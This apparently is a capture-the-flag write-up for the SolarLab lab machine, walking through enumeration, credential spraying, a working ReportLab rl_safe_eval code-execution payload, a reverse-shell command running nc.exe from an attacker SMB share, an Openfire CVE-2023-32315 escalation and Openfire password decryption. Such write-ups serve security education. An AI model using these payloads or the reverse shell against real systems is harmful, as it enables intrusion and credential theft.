Nmap Results
# Nmap 7.94SVN scan initiated Mon May 13 13:06:00 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.215.232
Nmap scan report for 10.129.215.232
Host is up (0.045s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
|_http-server-header: nginx/1.24.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
6791/tcp open http nginx 1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
|_http-server-header: nginx/1.24.0
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-13T17:07:53
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 13 13:08:29 2024 -- 1 IP address (1 host up) scanned in 149.48 seconds
In the output for tcp/80 and tcp/6791, we can see a redirect to solarlab.htb and report.solarlab.htb respectively. Let's get those hostnames added to our /etc/hosts file.
echo '10.129.215.232 solarlab.htb report.solarlab.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/139,445
SMB Null Session Share Access
We almost certainly won't be able to map the ADMIN$ and C$ shares anonymously, but the Documents share looks interesting.
SMB Null Session Enumeration
blake and openfire are two local users on the target.
Compile Information
I'm going to take the usernames (including the username portions of emails) and passwords found in this document and from RID cycling and put them into separate files, as we'll want to try spraying them at services.
Usernames
alexander.knight
KAlexander
blake.byte
AlexanderK
ClaudiaS
claudia.springer
blake
openfire
Passwords
al;ksdhfewoiuh
dkjafblkjadsfgl
d398sadsknr390
ThisCanB3typedeasily1@
danenacia9234n
dadsfawe9dafkn
TCP/80
gobuster enumeration didn't reveal anything interesting when using dir and vhost mode. Time to look at some other ports.
TCP/6791
Manual Login Testing
gobuster scans at it, even when tuning down the thread count. So, I'll just try some manual logins using the details-file.xlsx entries first, since there are only six entries.
Password Spraying with Hydra
nano valid-users.txt
We note that the server responds with User authentication error. when a login is invalid, and that the login payload looks like username=test&password=test. This login payload is sent in an HTTP POST request.
gobuster dir scans well, so I have to assume we just don't have the right username.
The naming convention appears to be {firstname}{l}, in other words, John Doe == JohnD. So, let's review our usernames.txt file for any names we can update to this naming convention.
If alexander.knight becomes AlexanderK and claudia.springer becomes ClaudiaS, then we should add a BlakeB to the list for blake.byte. Let's see what that does for our efforts.
echo 'BlakeB' >> valid-users.txt
Log in and Explore the App
ReportLab PDF Library, which is something we should research further.
Testing RCE
poc.txt
<para>
<font color="[ [ getattr(pow,Word('__globals__'))['os'].system('ping -n 2 10.10.14.35') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">
exploit
</font>
</para>
It will be best to use Burp to catch the request and send it to Repeater, so we can substitute our payload at various points for testing.
Right-click the request in Burp and choose Send to Repeater. I tried injecting my payload in the user_input field, but it seems the 300 character limit is validated server side. I then tried injecting the payload into the travel_request field and this worked, as it does not have a character limit that is checked by the server.
Exploit
Understanding the Exploit
The library had a similar known exploit in 2019 leading to remote code execution via the color attribute of HTML tags: the content of the attribute was directly evaluated as a Python expression using the eval function, thus leading to code execution. To mitigate the issue, ReportLab implemented a sandbox called rl_safe_eval that is stripped of all Python builtin functions and has multiple overridden builtin functions, to permit execution of the library's own safe code while stopping any access to dangerous functions and libraries that could subsequently lead to the construction of dangerous Python code.
One of the many overridden builtin classes is type. If this class is called with one argument, it returns the type of an object; however, if it is called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words, it allows the creation of a new class that inherits from another class.
Therefore, the gist of this exploit is that we can create a custom class that satisfies three conditions to bypass the safety checks:
Always return False for calls to the function startswith, to bypass name.startswith('__').
Return False on its first call to __eq__, to bypass the name in __rl_unsafe__ check; after the first call it should return the correct response, because when __eq__ is called by the Python builtin getattr it must return the correct result.
Its hash should be the same as the hash of its underlying string.
This custom class then sources the os module from the __globals__ scope and allows overwriting of the custom functions put in place as a mitigation.
Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: SOLARLAB
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00330-80112-18556-AA133
Original Install Date: 11/16/2023, 9:37:33 PM
System Boot Time: 5/14/2024, 12:58:41 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.21805430.B64.2305221826, 5/22/2023
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,814 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,437 MB
Virtual Memory: In Use: 1,362 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.231.39
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
============== ==============================================
solarlab\blake S-1-5-21-3606151065-2641007806-2768514320-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Users and Groups
Local Users
User accounts for \\SOLARLAB
-------------------------------------------------------------------------------
Administrator blake DefaultAccount
Guest openfire WDAGUtilityAccount
The command completed successfully.
Local Groups
Aliases for \\SOLARLAB
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.231.39
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Open Ports
TCP 127.0.0.1:5000 0.0.0.0:0 LISTENING 2260
TCP 127.0.0.1:5222 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5223 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5262 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5263 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5269 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5270 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5275 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:5276 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:7070 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:7443 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 2512
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 2512
Processes and Services
Interesting Processes
Name : openfire-service.exe
Owner :
CommandLine :
Name : timeout.exe
Owner : SOLARLAB\blake
CommandLine : timeout /t 600 /nobreak
Name : python3.11.exe
Owner : SOLARLAB\blake
CommandLine : "C:\Users\blake\AppData\Local\Microsoft\WindowsApps\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\python.exe" "C:\Users\blake\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\LocalCache\local-packages\Python311\Scripts\waitress-serve.exe" --listen 127.0.0.1:5000 --threads 10 app:app
Scheduled Tasks
Interesting Scheduled Tasks
TaskName : Start Internal App
User : blake
Action : C:\Users\blake\Documents\start-app.bat
Interesting Files
C:\Users\blake\Documents\app\instance\users.db
(binary SQLite file; the readable part of the raw dump is the schema)
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(50) NOT NULL,
password VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
)
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
user
sqlite> select * from user;
1|blakeb|ThisCanB3typedeasily1@
2|claudias|007poiuytrewq
3|alexanderk|HotP!fireguard
Privilege Escalation
Port Forwarding with Chisel
I'll be using the download_chisel function from my notes here to download the latest copy of the chisel binaries to the current directory.
Nmap can only perform -sT (full TCP connect) scans through a SOCKS proxy. As such, the scan will take a bit longer than your typical scan. Be patient!
chisel-nmap.txt
# Nmap 7.94SVN scan initiated Thu May 16 15:23:53 2024 as: nmap -Pn -p9091,9090,7443,7070,5276,5275,5270,5269,5263,5262,5223,5222,5000 -T5 -sC -sV -sT -oN chisel-nmap.txt 127.0.0.1
Nmap scan report for localhost (127.0.0.1)
Host is up (0.054s latency).
PORT STATE SERVICE VERSION
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Length: 2045
| Content-Type: text/html; charset=utf-8
| Date: Thu, 16 May 2024 19:24:07 GMT
| Server: waitress
| Vary: Cookie
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Login - ReportHub</title>
| <style>
| body {
| font-family: 'Arial', sans-serif;
| background-color: #f5f5f5;
| margin: 0;
| padding: 0;
| display: flex;
| flex-direction: column;
| align-items: center;
| height: 100vh;
| .logo {
| max-width: 200px;
| margin-bottom: 20px;
| display: block;
| margin: 0 auto;
| text-align: center;
| color: #333;
| form {
| max-w
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Connection: close
| Content-Length: 63
| Content-Type: text/plain; charset=utf-8
| Date: Thu, 16 May 2024 19:24:13 GMT
| Server: waitress
| Request
| Start line is invalid
|_ (generated by waitress)
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: 6cxq1mit31
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5223/tcp open ssl/jabber
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
5262/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: afhv556np4
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
|_ssl-date: TLS randomness does not represent time
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| host-unknown
| (timeout)
| stream_id: 201oqw75h4
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5270/tcp open ssl/xmpp Wildfire XMPP Client
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
|_ssl-date: TLS randomness does not represent time
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| features:
| errors:
| invalid-namespace
| (timeout)
| stream_id: 5vi18bdiq0
| auth_mechanisms:
| xmpp:
| version: 1.0
| capabilities:
|_ compression_methods:
5276/tcp open ssl/jabber
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| unknown:
| capabilities:
| auth_mechanisms:
| xmpp:
| errors:
| (timeout)
|_ compression_methods:
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:03 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:18 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:10 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:20 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
9090/tcp open zeus-admin?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:03 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:24:46 GMT
| Allow: GET,HEAD,POST,OPTIONS
| JavaRMI, drda, ibm-db2-das, informix:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| SqueezeCenter_CLI:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| WMSRequest:
| HTTP/1.1 400 Illegal character CNTL=0x1
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp open ssl/xmltec-xmlmail?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:25:10 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 115
| <html>
| <head><title></title>
| <meta http-equiv="refresh" content="0;URL=index.jsp">
| </head>
| <body>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Thu, 16 May 2024 19:25:15 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=solarlab.htb
| Subject Alternative Name: DNS:solarlab.htb, DNS:*.solarlab.htb
| Not valid before: 2023-11-17T12:22:21
|_Not valid after: 2028-11-15T12:22:21
Burp through the SOCKS5 Proxy
Openfire Admin Console
CVE-2023-32315
Run this command on the target to run nc.exe over SMB and connect to the TCP listener.
cmd.exe /c \\10.10.14.186\evil\nc.exe 10.10.14.186 443 -e powershell.exe
Lateral to openfire Service Account
The OFUSER table is created with 12 columns:
USERNAME
STOREDKEY
SERVERKEY
SALT
ITERATIONS
PLAINPASSWORD
ENCRYPTEDPASSWORD
NAME
EMAIL
CREATIONDATE
MODIFICATIONDATE
CONSTRAINT
The most interesting column here is PLAINPASSWORD, which is the sixth column.
Here, we can see the sixth column is NULL. However, we still have the user's encrypted password in column seven: becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442. Let's do some more research on how we might crack this.
Cracking the Administrator's Hash
blowfish encryption for this to work. This can be found at C:\Program Files\openfire\conf\security.xml, where $enc_password is the encrypted password from table [ofUser] column [encryptedPassword], and $blowfish_key is the blowfish key from table [ofProperty] column [propValue] where [name]='passwordKey'.
We also need the passwordKey string from the database, which should be simple enough.
Modifying the Exploit
Escalate to Administrator
Flags
User
cdd58d6118f4523f2ffd145e54875780
Root
3b0960ad0eed7f91650c5a73e74eb828